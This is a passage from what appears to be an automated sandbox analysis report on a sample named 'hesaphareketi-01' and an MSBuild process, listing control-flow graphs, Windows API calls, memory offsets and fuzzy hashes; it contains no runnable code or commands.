                                                control_flow_graph 160 f444b0-f459d9 CreateActCtxA 164 f459e2-f45a3c 160->164 165 f459db-f459e1 160->165 172 f45a3e-f45a41 164->172 173 f45a4b-f45a4f 164->173 165->164 172->173 174 f45a60 173->174 175 f45a51-f45a5d 173->175 177 f45a61 174->177 175->174 177->177
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 00F459C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ec00c8795b7951dd176426e6b5d9ea0c9be1be732a5ab6cb0e212fa0e66ef134
                                                • Instruction ID: 418e18eb1acb6fd42797ee353a8b2fef8ebbc0dfa807a3022ff18ac793dc474c
                                                • Opcode Fuzzy Hash: ec00c8795b7951dd176426e6b5d9ea0c9be1be732a5ab6cb0e212fa0e66ef134
                                                • Instruction Fuzzy Hash: E741D2B0C0071DCBDB24DFA9C8847CEBBB5BF88714F20816AD808AB251DB756945CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 178 f4d708-f4d70a 179 f4d70c-f4d70d 178->179 180 f4d70e-f4d7a4 DuplicateHandle 178->180 179->180 181 f4d7a6-f4d7ac 180->181 182 f4d7ad-f4d7ca 180->182 181->182
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4D797
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4a099af976a476cc402862c42c9d56129c4e360d7660a67a006a60a7e35cecd4
                                                • Instruction ID: fe06cba1fd2f116384fd767fcd658c067b251d37e8e0d66ffd73859e53df080f
                                                • Opcode Fuzzy Hash: 4a099af976a476cc402862c42c9d56129c4e360d7660a67a006a60a7e35cecd4
                                                • Instruction Fuzzy Hash: 0C2103B59002499FDB10CFAAD984AEEBFF4EB48320F14841AE954E3351C378A941CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 185 f4d710-f4d7a4 DuplicateHandle 186 f4d7a6-f4d7ac 185->186 187 f4d7ad-f4d7ca 185->187 186->187
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4D797
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 20c24e421a6e46587a961ec4a53bfd4eb29af5ef02c20b9a1bf8684cebf86ab7
                                                • Instruction ID: 3878b4a1592c0b424848d61812eb7d52dc267336179cb75c7d87d7cf5ebbd65e
                                                • Opcode Fuzzy Hash: 20c24e421a6e46587a961ec4a53bfd4eb29af5ef02c20b9a1bf8684cebf86ab7
                                                • Instruction Fuzzy Hash: EA21E4B5900209DFDB10CF9AD984ADEBFF4EB48320F14841AE914A3350D378A950CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 190 f4b018-f4b058 191 f4b060-f4b08b GetModuleHandleW 190->191 192 f4b05a-f4b05d 190->192 193 f4b094-f4b0a8 191->193 194 f4b08d-f4b093 191->194 192->191 194->193
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00F4B07E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 39b4648f14b6e08c30242c486246b3009dfd63674e0c43e96e95e90b8f0ebe8a
                                                • Instruction ID: 795cc15710e31c9c2b271735760abce5bcea61207177e8afd7d1bacedb91a403
                                                • Opcode Fuzzy Hash: 39b4648f14b6e08c30242c486246b3009dfd63674e0c43e96e95e90b8f0ebe8a
                                                • Instruction Fuzzy Hash: 7D110FB5C002498FDB20CFAAC444BDFFBF4AB88324F10841AD828A7210D379A545CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 196 72411b9-724122a PostMessageW 198 7241233-7241247 196->198 199 724122c-7241232 196->199 199->198
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0724121D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: a8101da697af3ba1cde7497a8c858d7c053da1d98de52e0a9fb99d6ee99d1c91
                                                • Instruction ID: 978ae1a4cb3bb40111fa9095ba77bddba34efefccfd36b2117b601202359274d
                                                • Opcode Fuzzy Hash: a8101da697af3ba1cde7497a8c858d7c053da1d98de52e0a9fb99d6ee99d1c91
                                                • Instruction Fuzzy Hash: 4C11F2B5800249DFDB10CF9AD985BDFFBF8EB48324F10845AE558A7210C379A594CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 201 72411c0-724122a PostMessageW 202 7241233-7241247 201->202 203 724122c-7241232 201->203 203->202
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0724121D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 7ed4ab5caedbc8cdbaf0704e3bd27fb772ba86e208558a4945fcbd62e2efadc6
                                                • Instruction ID: 64368f30172ce05fc24e742fbaee38b520bea0258f978bb4f17535bb4a506210
                                                • Opcode Fuzzy Hash: 7ed4ab5caedbc8cdbaf0704e3bd27fb772ba86e208558a4945fcbd62e2efadc6
                                                • Instruction Fuzzy Hash: D31103B5800349DFDB10CF9AC544BDFBBF8EB48320F108419E518A7200C379A594CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f624e2599ade67deab41fe22c6bcea445e605307afcdd972cfee2b132706318
                                                • Instruction ID: 901790c5102b024d27cf9c6832fb62f7ecde7cc9c691be41fe2143394cf5791a
                                                • Opcode Fuzzy Hash: 8f624e2599ade67deab41fe22c6bcea445e605307afcdd972cfee2b132706318
                                                • Instruction Fuzzy Hash: 2B210371508240DFDB05DF54DDC0B26BF65FB88318F20C569ED092B296C336D896CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 37e7eec9895711bd26144ddc58ca17872b88779fb17b4dbbf58410c21df9b1d3
                                                • Instruction ID: 81f6b9199050fcfc707b69b709948d5b5c083c95976d2579af2b08ef231dc98a
                                                • Opcode Fuzzy Hash: 37e7eec9895711bd26144ddc58ca17872b88779fb17b4dbbf58410c21df9b1d3
                                                • Instruction Fuzzy Hash: 3F213A71508204DFDB04DF54DDC0B16BF65FB94324F20C56DE9095B296C336E896CBA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5137cfaf1498100c41630180bd1728f44aa285ed0aa75fc6a27adc319b1980c5
                                                • Instruction ID: dd41bc78297bf3c53d459575e42a1a9b40152037c6f649080a8d71f38d576fdc
                                                • Opcode Fuzzy Hash: 5137cfaf1498100c41630180bd1728f44aa285ed0aa75fc6a27adc319b1980c5
                                                • Instruction Fuzzy Hash: B8210771508204EFDB05DF54D9C0B96BBA5FB84318F30C66DD9195B2A2C336D886CA61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eadb21830ac5223942db0cbcb69b1a7e4c80a1a1b4ee9389896c2887db57911a
                                                • Instruction ID: 12f63074b00d41c3dd71a9e6b7dda71db9d0d2aaace751ff06d06ae69e2e96f3
                                                • Opcode Fuzzy Hash: eadb21830ac5223942db0cbcb69b1a7e4c80a1a1b4ee9389896c2887db57911a
                                                • Instruction Fuzzy Hash: DB21F275608204EFDB14DF14D984B96BB66FB88318F20C56DD90A5B296C33AD887CA61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75a533a11b3fd060d1814b49ca9ddd2929fc265aaa2f3eb812500c4ff8cf293f
                                                • Instruction ID: 922ca2f9b07422ee2e0933fdb60983dc57944800fb5915def3e579351531c7e6
                                                • Opcode Fuzzy Hash: 75a533a11b3fd060d1814b49ca9ddd2929fc265aaa2f3eb812500c4ff8cf293f
                                                • Instruction Fuzzy Hash: 1521537550D3808FC712CF24D994755BF71EB46318F28C5DAD8498F6A7C33A984ACB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction ID: 2d2e04fd2b71d6307c59fd8b573c90c9711521afb94adaf103bcb3dbd81a7016
                                                • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction Fuzzy Hash: A1110372404280CFCB01CF50D9C0B16BF71FB88328F24C6A9DC091B296C33AD85ACBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction ID: c1fa38dfe242db99553c452bad97ba1a90a07a8aebac7493c7d1a41b0b56c4ed
                                                • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                                • Instruction Fuzzy Hash: 4B11D376504240DFCB15CF54D9C4B16BF71FB94328F24C6A9D8094B656C33AE856CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction ID: ac3ee7d0a1e316a9fba8cebbe33e0946be6262e188574a7c70e97a5f186fac1e
                                                • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                                • Instruction Fuzzy Hash: 7911DD75508280DFCB01CF50C9C0B55FBB1FB84318F24C6ADD8494B6A6C33AD89ACB61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f46611974a6948862525d7ba8b702b4446cb94d13ca6ed2b8a026408bebedbb
                                                • Instruction ID: 90f25c14635b5749ccfc2efd5ccca74308617a1d3adcb2a8c7e0c081374b5f74
                                                • Opcode Fuzzy Hash: 0f46611974a6948862525d7ba8b702b4446cb94d13ca6ed2b8a026408bebedbb
                                                • Instruction Fuzzy Hash: FA01A7714083459AE7104AA9CD847A7FB98EF81325F2C855BED095E1C2D2789881C771
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 458bd8118fb838c9bbacdab4a8dfe6c8bf91096ae26265e749a58270a13d1963
                                                • Instruction ID: e162a1096d27492da390c60289e508debbb4415e3c2d5a9371d98b756ba63e15
                                                • Opcode Fuzzy Hash: 458bd8118fb838c9bbacdab4a8dfe6c8bf91096ae26265e749a58270a13d1963
                                                • Instruction Fuzzy Hash: 70F062714093449AE7108A1ADD84B66FF98EB91739F18C55AED085E2C6C2799884CB71
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92221e1b86fb978115c3fd07b15f8d130b1113a87c7f2e5f6e221b70e9b75d37
                                                • Instruction ID: 5e6823b25293d5bd8f998013cd3215c6116eaac54d4e2b74c1a43472bca80546
                                                • Opcode Fuzzy Hash: 92221e1b86fb978115c3fd07b15f8d130b1113a87c7f2e5f6e221b70e9b75d37
                                                • Instruction Fuzzy Hash: FAA16D36E002098FCF05DFB4C8405DEBBB2FF89314B15857AE809AB265DB75E95ADB40

                                                Execution Graph

                                                Execution Coverage:14.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:8.9%
                                                Total number of Nodes:45
                                                Total number of Limit Nodes:4
                                                execution_graph 26450 2b1ced8 26451 2b1cee4 26450->26451 26458 6750d60 26451->26458 26464 6750d50 26451->26464 26452 2b1cf98 26470 67885b0 26452->26470 26476 67885a0 26452->26476 26453 2b1d0b7 26459 6750d82 26458->26459 26460 6750e4e 26459->26460 26482 6757b8c 26459->26482 26488 6757588 26459->26488 26492 67577a8 26459->26492 26460->26452 26465 6750d60 26464->26465 26466 6750e4e 26465->26466 26467 6757b8c 2 API calls 26465->26467 26468 67577a8 2 API calls 26465->26468 26469 6757588 LdrInitializeThunk 26465->26469 26466->26452 26467->26466 26468->26466 26469->26466 26471 67885d2 26470->26471 26472 67886e4 26471->26472 26473 6757b8c 2 API calls 26471->26473 26474 67577a8 2 API calls 26471->26474 26475 6757588 LdrInitializeThunk 26471->26475 26472->26453 26473->26472 26474->26472 26475->26472 26477 678854e 26476->26477 26477->26476 26478 67886e4 26477->26478 26479 6757b8c 2 API calls 26477->26479 26480 67577a8 2 API calls 26477->26480 26481 6757588 LdrInitializeThunk 26477->26481 26478->26453 26479->26478 26480->26478 26481->26478 26484 6757a43 26482->26484 26483 6757b84 LdrInitializeThunk 26486 6757ce1 26483->26486 26484->26483 26487 6757588 LdrInitializeThunk 26484->26487 26486->26460 26487->26484 26489 675759a 26488->26489 26491 675759f 26488->26491 26489->26460 26490 6757cc9 LdrInitializeThunk 26490->26489 26491->26489 26491->26490 26496 67577d9 26492->26496 26493 6757939 26493->26460 26494 6757b84 LdrInitializeThunk 26494->26493 26496->26493 26496->26494 26497 6757588 LdrInitializeThunk 26496->26497 26497->26496 26498 6757e78 26499 6757e7f 26498->26499 26501 6757e85 26498->26501 26500 6757588 LdrInitializeThunk 26499->26500 26499->26501 26503 6758206 26499->26503 26500->26503 26502 6757588 LdrInitializeThunk 26502->26503 26503->26501 26503->26502

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 989 6757588-6757598 990 675759f-67575ab 989->990 991 675759a 989->991 994 67575b2-67575c7 990->994 995 67575ad 990->995 992 67576cb-67576d5 991->992 998 67575cd-67575d8 994->998 999 67576db-675771b 994->999 995->992 1002 67576d6 998->1002 1003 67575de-67575e5 998->1003 1015 6757722-67577d7 999->1015 1002->999 1004 67575e7-67575fe 1003->1004 1005 6757612-675761d 1003->1005 1014 6757604-6757607 1004->1014 1004->1015 1010 675761f-6757627 1005->1010 1011 675762a-6757634 1005->1011 1010->1011 1020 67576be-67576c3 1011->1020 1021 675763a-6757644 1011->1021 1014->1002 1018 675760d-6757610 1014->1018 1047 67577de-6757874 1015->1047 1048 67577d9 1015->1048 1018->1004 1018->1005 1020->992 1021->1002 1025 675764a-6757666 1021->1025 1031 6757668 1025->1031 1032 675766a-675766d 1025->1032 1031->992 1034 6757674-6757677 1032->1034 1035 675766f-6757672 1032->1035 1036 675767a-6757688 1034->1036 1035->1036 1036->1002 1040 675768a-6757691 1036->1040 1040->992 1041 6757693-6757699 1040->1041 1041->1002 1042 675769b-67576a0 1041->1042 1042->1002 1044 67576a2-67576b5 1042->1044 1044->1002 1049 67576b7-67576ba 1044->1049 1052 6757913-6757919 1047->1052 1048->1047 1049->1041 1051 67576bc 1049->1051 1051->992 1053 675791f-6757937 1052->1053 1054 6757879-675788c 1052->1054 1057 6757939-6757946 1053->1057 1058 675794b-675795e 1053->1058 1055 6757893-67578e4 1054->1055 1056 675788e 1054->1056 1074 67578f7-6757909 1055->1074 1075 67578e6-67578f4 1055->1075 1056->1055 1061 6757ce1-6757dde 1057->1061 1059 6757965-6757981 1058->1059 1060 6757960 1058->1060 1063 6757983 1059->1063 1064 6757988-67579ac 1059->1064 1060->1059 1066 6757de6-6757df0 1061->1066 1067 6757de0-6757de5 1061->1067 1063->1064 1070 67579b3-67579e5 1064->1070 1071 67579ae 1064->1071 1067->1066 1080 67579e7 1070->1080 1081 67579ec-6757a2e 1070->1081 1071->1070 1077 6757910 1074->1077 1078 675790b 1074->1078 1075->1053 1077->1052 1078->1077 1080->1081 1083 6757a35-6757a3e 1081->1083 1084 6757a30 1081->1084 1085 6757c66-6757c6c 1083->1085 1084->1083 1086 6757a43-6757a68 1085->1086 1087 6757c72-6757c85 1085->1087 1088 6757a6f-6757aa6 1086->1088 1089 6757a6a 1086->1089 1090 6757c87 1087->1090 1091 6757c8c-6757ca7 1087->1091 1099 6757aad-6757adf 1088->1099 1100 6757aa8 1088->1100 1089->1088 1090->1091 1092 6757cae-6757cc2 1091->1092 1093 6757ca9 1091->1093 1097 6757cc4 1092->1097 1098 6757cc9-6757cdf LdrInitializeThunk 1092->1098 1093->1092 1097->1098 1098->1061 1102 6757ae1-6757b06 1099->1102 1103 6757b43-6757b56 1099->1103 1100->1099 1104 6757b0d-6757b3b 1102->1104 1105 6757b08 1102->1105 1106 6757b5d-6757b82 1103->1106 1107 6757b58 1103->1107 1104->1103 1105->1104 1110 6757b84-6757b85 1106->1110 1111 6757b91-6757bc9 1106->1111 1107->1106 1110->1087 1112 6757bd0-6757c31 call 6757588 1111->1112 1113 6757bcb 1111->1113 1119 6757c33 1112->1119 1120 6757c38-6757c5c 1112->1120 1113->1112 1119->1120 1123 6757c63 1120->1123 1124 6757c5e 1120->1124 1123->1085 1124->1123
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707161162.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6750000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e935aeed2cb9d7b487d94d290fa5f0de8153e238e01dc8d23a2f3db1392b4a37
                                                • Instruction ID: de4cf7c32058b3c9e67f5743b1f0ed5d5babcd99b0d5cf7088593e90c469c7e8
                                                • Opcode Fuzzy Hash: e935aeed2cb9d7b487d94d290fa5f0de8153e238e01dc8d23a2f3db1392b4a37
                                                • Instruction Fuzzy Hash: 5B221974E00219CFDB58DFA8C884BADBBB2BF84300F1185A9D809AB355EB759D85CF50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1eb4fdbf844ba40194c7c0479b022cb0fc5a634adc89bcfe0c6dd3900ed17058
                                                • Instruction ID: 36128603b1171804622e3721ba301693eae39a50fd475402c861bbdfab8b1f87
                                                • Opcode Fuzzy Hash: 1eb4fdbf844ba40194c7c0479b022cb0fc5a634adc89bcfe0c6dd3900ed17058
                                                • Instruction Fuzzy Hash: 51B24F78A41218DFD764EF24DC84BDEBB72BB89310F108699D41A633A4CB34AE85DF51
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c9461d449c0f4711ab7c6ac7a41de5ffb4d1e5d785dd5480b1f4749eff3f7325
                                                • Instruction ID: ef3de69514f47a27e0dd6f34c718d2cb653897cf168e6bd86db7300c525a22d9
                                                • Opcode Fuzzy Hash: c9461d449c0f4711ab7c6ac7a41de5ffb4d1e5d785dd5480b1f4749eff3f7325
                                                • Instruction Fuzzy Hash: 4F72AF71A00609DFCB15CF68C998AAEBBF2FF49300F558599E805DB2A5D730F991CB90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2912 6780d48-6780d68 2913 6780d6a 2912->2913 2914 6780d6f-6780de8 2912->2914 2913->2914 2918 6780dea-6780e31 2914->2918 2919 6780e36-6780e89 2914->2919 2926 6780ed1-6780f8b call 2b14dc8 2918->2926 2919->2926 2927 6780e8b-6780ed0 2919->2927 2937 6780f90-6780fb6 2926->2937 2927->2926 2939 6780fbc-67810bf 2937->2939 2940 6781b77-6781bac 2937->2940 2950 6781b6a-6781b70 2939->2950 2951 67810c4-67811a2 2950->2951 2952 6781b76 2950->2952 2960 67811a9-6781212 2951->2960 2961 67811a4 2951->2961 2952->2940 2965 6781219-678122a 2960->2965 2966 6781214 2960->2966 2961->2960 2967 6781230-678123a 2965->2967 2968 67812b7-67813be 2965->2968 2966->2965 2969 678123c 2967->2969 2970 6781241-67812b6 2967->2970 2986 67813c0 2968->2986 2987 67813c5-678142e 2968->2987 2969->2970 2970->2968 2986->2987 2991 6781430 2987->2991 2992 6781435-6781446 2987->2992 2991->2992 2993 678144c-6781456 2992->2993 2994 67814d3-6781687 2992->2994 2995 6781458 2993->2995 2996 678145d-67814d2 2993->2996 3015 6781689 2994->3015 3016 678168e-678170c 2994->3016 2995->2996 2996->2994 3015->3016 3020 678170e 3016->3020 3021 6781713-6781724 3016->3021 3020->3021 3022 678172a-6781734 3021->3022 3023 67817b1-678184a 3021->3023 3024 678173b-67817b0 3022->3024 3025 6781736 3022->3025 3033 678184c 3023->3033 3034 6781851-67818c9 3023->3034 3024->3023 3025->3024 3033->3034 3041 67818cb 3034->3041 3042 67818d0-67818e1 3034->3042 3041->3042 3043 67819cf-6781a63 3042->3043 3044 67818e7-678197b 3042->3044 3053 6781a69-6781b54 3043->3053 3054 6781b55-6781b60 3043->3054 3058 678197d 3044->3058 3059 6781982-67819ce 3044->3059 3053->3054 3056 6781b62 3054->3056 3057 6781b67 3054->3057 3056->3057 3057->2950 3058->3059 3059->3043
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4808a0825fb00abb983e4dfe730672ccc974e739c8fa3d2889686e7a727db701
                                                • Instruction ID: 99dece4f46f9270d501bd8656a15c5a071325b3b8e98d783d4b2571c2fbe10db
                                                • Opcode Fuzzy Hash: 4808a0825fb00abb983e4dfe730672ccc974e739c8fa3d2889686e7a727db701
                                                • Instruction Fuzzy Hash: 38825D74E012299FEB64EF69D898BDDBBB2BF49300F1081EA950DA7255DB305E81CF44

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3075 2b1e431-2b1e460 3076 2b1e462 3075->3076 3077 2b1e467-2b1e4e9 3075->3077 3076->3077 3079 2b1e550-2b1e566 3077->3079 3080 2b1e568-2b1e5b2 call 2b10364 3079->3080 3081 2b1e4eb-2b1e4f4 3079->3081 3092 2b1e5b4-2b1e5f5 call 2b10384 3080->3092 3093 2b1e61d-2b1e61e 3080->3093 3082 2b1e4f6 3081->3082 3083 2b1e4fb-2b1e546 call 2b1bb84 3081->3083 3082->3083 3090 2b1e548 3083->3090 3091 2b1e54d 3083->3091 3090->3091 3091->3079 3099 2b1e617-2b1e618 3092->3099 3100 2b1e5f7-2b1e615 3092->3100 3094 2b1e61f-2b1e6be 3093->3094 3107 2b1f010-2b1f047 3094->3107 3108 2b1e6c4-2b1e6e5 3094->3108 3102 2b1e619-2b1e61b 3099->3102 3100->3102 3102->3094 3111 2b1efed-2b1f009 3108->3111 3112 2b1e6ea-2b1e6f3 3111->3112 3113 2b1f00f 3111->3113 3114 2b1e6f5 3112->3114 3115 2b1e6fa-2b1e760 call 2b1b020 3112->3115 3113->3107 3114->3115 3120 2b1e762 3115->3120 3121 2b1e767-2b1e7f1 call 2b1b030 3115->3121 3120->3121 3128 2b1e803-2b1e80a 3121->3128 3129 2b1e7f3-2b1e7fa 3121->3129 3130 2b1e811-2b1e81e 3128->3130 3131 2b1e80c 3128->3131 3132 2b1e801 3129->3132 3133 2b1e7fc 3129->3133 3134 2b1e820 3130->3134 3135 2b1e825-2b1e82c 3130->3135 3131->3130 3132->3130 3133->3132 3134->3135 3136 2b1e833-2b1e88a 3135->3136 3137 2b1e82e 3135->3137 3140 2b1e891-2b1e8a8 3136->3140 3141 2b1e88c 3136->3141 3137->3136 3142 2b1e8b3-2b1e8bb 3140->3142 3143 2b1e8aa-2b1e8b1 3140->3143 3141->3140 3144 2b1e8bc-2b1e8c6 3142->3144 3143->3144 3145 2b1e8c8 3144->3145 3146 2b1e8cd-2b1e8d6 3144->3146 3145->3146 3147 2b1efbd-2b1efc3 3146->3147 3148 2b1efc9-2b1efe3 3147->3148 3149 2b1e8db-2b1e8e7 3147->3149 3158 2b1efe5 3148->3158 3159 2b1efea 3148->3159 3150 2b1e8e9 3149->3150 3151 2b1e8ee-2b1e8f3 3149->3151 3150->3151 3152 2b1e8f5-2b1e901 3151->3152 3153 2b1e936-2b1e938 3151->3153 3156 2b1e903 3152->3156 3157 2b1e908-2b1e90d 3152->3157 3155 2b1e93e-2b1e952 3153->3155 3160 2b1e958-2b1e96d 3155->3160 3161 2b1ef9b-2b1efa8 3155->3161 3156->3157 3157->3153 3162 2b1e90f-2b1e91c 3157->3162 3158->3159 3159->3111 3165 2b1e974-2b1e9fa 3160->3165 3166 2b1e96f 3160->3166 3167 2b1efa9-2b1efb3 3161->3167 3163 2b1e923-2b1e934 3162->3163 3164 